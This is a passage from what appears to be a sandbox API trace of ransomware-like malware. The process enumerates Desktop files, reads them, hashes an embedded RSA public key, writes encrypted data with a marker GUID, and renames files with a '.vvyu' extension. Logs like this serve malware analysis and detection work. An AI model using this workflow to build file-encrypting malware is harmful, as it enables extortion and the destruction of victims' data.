hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0188.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0188.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27cc0 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.122] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x1e80, lpOverlapped=0x0) returned 1 [0188.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.123] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1e85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.123] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.124] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.125] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.125] CloseHandle (hObject=0x584) returned 1 [0188.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0188.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0188.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0188.127] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\hxqHaq.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\hxqhaq.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\hxqHaq.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\hxqhaq.mkv.vvyu")) returned 1 [0188.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.129] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.131] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ce4850, ftCreationTime.dwHighDateTime=0x1d896e4, ftLastAccessTime.dwLowDateTime=0xe8751e50, ftLastAccessTime.dwHighDateTime=0x1d89f96, ftLastWriteTime.dwLowDateTime=0xe8751e50, ftLastWriteTime.dwHighDateTime=0x1d89f96, nFileSizeHigh=0x0, nFileSizeLow=0xb163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rgwTa9twwGw5.csv", cAlternateFileName="RGWTA9~1.CSV")) returned 1 [0188.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0188.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.132] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\rgwTa9twwGw5.csv") returned=".csv" [0188.132] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\rgwTa9twwGw5.csv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\rgwta9twwgw5.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.140] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=45411) returned 1 [0188.141] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.144] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb13d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.144] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.146] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.146] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xb163, lpOverlapped=0x0) returned 1 [0188.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.147] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.147] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.149] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.149] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.149] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.149] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.149] GetLastError () returned 0x0 [0188.165] GetLastError () returned 0x0 [0188.165] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.165] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.166] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.166] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.166] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb160) returned 0x2d43778 [0188.166] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.167] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39850 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0188.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: 